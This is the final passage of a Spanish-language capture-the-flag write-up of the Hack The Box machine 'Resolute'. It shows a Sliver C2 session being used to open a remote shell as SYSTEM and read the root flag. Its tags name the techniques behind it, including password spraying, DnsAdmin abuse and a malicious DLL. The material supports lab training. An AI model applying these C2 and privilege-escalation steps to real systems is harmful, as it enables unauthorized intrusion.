6[*] Session 9b99e9cc LUCKY_SPEND - 10.129.201.75:51954 (Resolute) - windows/amd64 - Sat, 07 Sep 2024 23:02:21 CEST
Seleccionamos esta sesión.
1[server] sliver (LUCKY_SPEND) > use 9b99e9cc
2
3[*] Active session LUCKY_SPEND (9b99e9cc-2e72-4ddf-a05d-7314b47e7721)
Y conseguimos una consola interactiva.
1[server] sliver (LUCKY_SPEND) > shell
2
3? This action is bad OPSEC, are you an adult? Yes
4
5[*] Wait approximately 10 seconds after exit, and press <enter> to continue
6[*] Opening shell tunnel (EOF to exit) ...
7
8[*] Started remote shell with pid 656
9
10PS C:\Windows\system32> whoami
11whoami
12nt authority\system
Podemos leer la flag de root
1PS C:\Users\Administrator\Desktop> type root.txt
2type root.txt
3dea00efd37ab...
¡Y ya estaría!
Happy Hacking! 🚀
#HackTheBox #Resolute #Writeup #Cybersecurity #Penetration Testing #CTF #Reverse Shell #Privilege Escalation #RCE #Exploit #Windows #SMB Enumeration #LDAP Enumeration #Kerbrute #ASREPRoast #RPC Enumeration #Information Disclosure #Password Spraying #Abusing WinRM #User Pivoting #Bloodhound Enumeration #Winpeas Enumeration #Abusing DnsAdmin Group #Sliver #C2 #Creating Malicious DLL